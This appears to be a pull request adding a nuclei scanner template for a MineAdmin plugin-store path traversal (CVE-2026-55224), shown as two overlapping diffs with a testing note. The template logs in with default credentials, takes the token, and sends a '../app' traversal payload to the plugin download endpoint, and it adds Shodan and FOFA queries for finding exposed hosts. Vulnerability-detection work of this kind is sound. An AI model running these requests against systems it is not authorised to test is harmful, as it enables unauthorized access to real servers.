### PR TITLE
Add CVE-2026-55224 - MineAdmin Plugin Store Path Traversal

### DIFF
--- a/http/cves/2026/CVE-2026-55224.yaml
+++ b/http/cves/2026/CVE-2026-55224.yaml
@@ -1,26 +1,22 @@
 id: CVE-2026-55224
 
 info:
-  name: MineAdmin Plugin Store - Path Traversal
+  name: MineAdmin < 3.2.0-alpha.2 - Plugin Path Traversal to RCE
   author: afanti
   severity: high
   description: |
-    MineAdmin versions before 3.2.0-alpha.2 contain a path traversal vulnerability in the app-store
-    plugin service. The identifier parameter is concatenated into filesystem paths without sanitization,
-    allowing path traversal sequences (e.g. ../) to read, install, or uninstall plugins from arbitrary
-    directories, and potentially execute arbitrary composer commands.
+    MineAdmin versions before 3.2.0-alpha.2 contain a path traversal vulnerability in the app-store plugin service. The identifier parameter is concatenated into filesystem paths without sanitization.
   impact: |
-    Authenticated users can escape the plugin directory to read or manipulate arbitrary files/directories,
-    and potentially achieve arbitrary code execution via composer commands executed during plugin install.
+    Authenticated users can escape the plugin directory to read or manipulate arbitrary files/directories.
   remediation: |
     Upgrade MineAdmin to version 3.2.0-alpha.2 or later.
   reference:
     - https://github.com/advisories/GHSA-59xm-4m8c-g3xj
-    - https://github.com/mineadmin/MineAdmin/commit/ca41902a2a5422676227e5088f4cc1dec06044f1
+    - https://github.com/mineadmin/MineAdmin/pull/728
     - https://nvd.nist.gov/vuln/detail/CVE-2026-55224
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 8.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+    cvss-score: 7.5
     cve-id: CVE-2026-55224
     cwe-id: CWE-22
   metadata:
@@ -28,7 +24,14 @@ info:
     max-request: 2
     vendor: mineadmin
     product: mineadmin
-  tags: cve,cve2026,mineadmin,path-traversal,plugin-store
+    shodan-query: http.html:"MineAdmin"
+    fofa-query: body="MineAdmin"
+  tags: cve,cve2026,mineadmin,path-traversal,rce,default-login
+
+variables:
+  username:
+  password:
+  token: ""
 
 flow: http(1) && http(2)
 
@@ -38,40 +41,40 @@ http:
         POST /admin/passport/login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
+        Accept: application/json
 
-        {"username":"admin","password":"123456"}
+        {"username":"{{username}}","password":"{{password}}"}
 
     matchers:
       - type: dsl
         dsl:
-          - 'status_code == 200'
-          - 'contains(body, "access_token")'
+          - status_code == 200
+          - contains(content_type, "application/json")
         condition: and
         internal: true
 
     extractors:
-      - type: regex
+      - type: json
         name: token
-        internal: true
         part: body
-        group: 1
-        regex:
-          - '"access_token":"([^"]+)"'
+        json:
+          - '.data.access_token'
+        internal: true
 
   - raw:
       - |
         POST /admin/plugin/store/download HTTP/1.1
         Host: {{Hostname}}
-        Authorization: Bearer {{token}}
         Content-Type: application/json
+        Accept: application/json
+        Authorization: Bearer {{token}}
 
         {"identifier":"../app","version":"1.0.0"}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - '"code":200'
-          - '"result":true'
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains_all(body, "result", "true")
+          - '!contains(body, "params_fail")'
         condition: and

--- a/http/cves/2026/CVE-2026-55224.yaml
+++ b/http/cves/2026/CVE-2026-55224.yaml
@@ -1,0 +1,77 @@
+id: CVE-2026-55224
+
+info:
+  name: MineAdmin Plugin Store - Path Traversal
+  author: afanti
+  severity: high
+  description: |
+    MineAdmin versions before 3.2.0-alpha.2 contain a path traversal vulnerability in the app-store
+    plugin service. The identifier parameter is concatenated into filesystem paths without sanitization,
+    allowing path traversal sequences (e.g. ../) to read, install, or uninstall plugins from arbitrary
+    directories, and potentially execute arbitrary composer commands.
+  impact: |
+    Authenticated users can escape the plugin directory to read or manipulate arbitrary files/directories,
+    and potentially achieve arbitrary code execution via composer commands executed during plugin install.
+  remediation: |
+    Upgrade MineAdmin to version 3.2.0-alpha.2 or later.
+  reference:
+    - https://github.com/advisories/GHSA-59xm-4m8c-g3xj
+    - https://github.com/mineadmin/MineAdmin/commit/ca41902a2a5422676227e5088f4cc1dec06044f1
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-55224
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2026-55224
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: mineadmin
+    product: mineadmin
+  tags: cve,cve2026,mineadmin,path-traversal,plugin-store
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        POST /admin/passport/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"username":"admin","password":"123456"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "access_token")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: token
+        internal: true
+        part: body
+        group: 1
+        regex:
+          - '"access_token":"([^"]+)"'
+
+  - raw:
+      - |
+        POST /admin/plugin/store/download HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{token}}
+        Content-Type: application/json
+
+        {"identifier":"../app","version":"1.0.0"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"code":200'
+          - '"result":true'
+        condition: and


### PR DESCRIPTION
### Template / PR Information

- **Template ID**: CVE-2026-55224
- **CVE**: CVE-2026-55224
- **Product**: MineAdmin < 3.2.0-alpha.2
- **Severity**: High (CVSS 8.8)
- **CWE**: CWE-22 (Path Traversal)

### Description

MineAdmin versions before 3.2.0-alpha.2 contain a path traversal vulnerability in the app-store plugin service. The `identifier` parameter is concatenated into filesystem paths without sanitization, allowing path traversal sequences (e.g. `../`) to read, install, or uninstall plugins from arbitrary directories, and potentially execute arbitrary composer commands during plugin install.

The template first authenticates via the default admin credentials (`admin` / `123456`) on `POST /admin/passport/login`, then issues a path-traversal request to `POST /admin/plugin/store/download`.

### Testing

Verified against a local reproduction of the vulnerable and patched handler logic:

- **Vulnerable** (`< 3.2.0-alpha.2`): traversal `identifier` (`../app`) is accepted → response body contains `"code":200` and `"result":true`.
- **Patched** (`>= 3.2.0-alpha.2`, commit `ca41902a2a5422676227e5088f4cc1dec06044f1`): `normalizeIdentifier()` rejects traversal identifiers → response body contains `"code":400`.

nuclei result (vulnerable):
```
[CVE-2026-55224] [http] [high] http://TARGET/admin/plugin/store/download
```

### References

- https://github.com/advisories/GHSA-59xm-4m8c-g3xj
- https://github.com/mineadmin/MineAdmin/commit/ca41902a2a5422676227e5088f4cc1dec06044f1
- https://github.com/mineadmin/MineAdmin/releases/tag/v3.2.0-alpha.2
- https://nvd.nist.gov/vuln/detail/CVE-2026-55224
